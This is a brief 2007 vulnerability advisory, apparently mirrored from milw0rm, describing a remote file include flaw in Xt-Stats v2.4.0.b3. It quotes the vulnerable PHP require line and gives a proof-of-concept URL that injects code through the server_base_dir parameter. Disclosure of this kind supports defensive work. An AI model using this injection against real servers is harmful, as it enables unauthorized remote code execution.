Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15905
HistoryJan 29, 2007 - 12:00 a.m.

Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability

2007-01-2900:00:00
vulners.com
13

Download:http://www.xt-scripts.com/index.php?dl=32


Finded by ThE dE@Th


Greetz For :AsB-May Team & HaCk.eGy


xt_counter.php:


require( $server_base_dir.'management/sources/counter_class.php');

http://www.site.com/[path]/xt_counter.php?server_base_dir=[evil_code]


milw0rm.com [2007-01-27]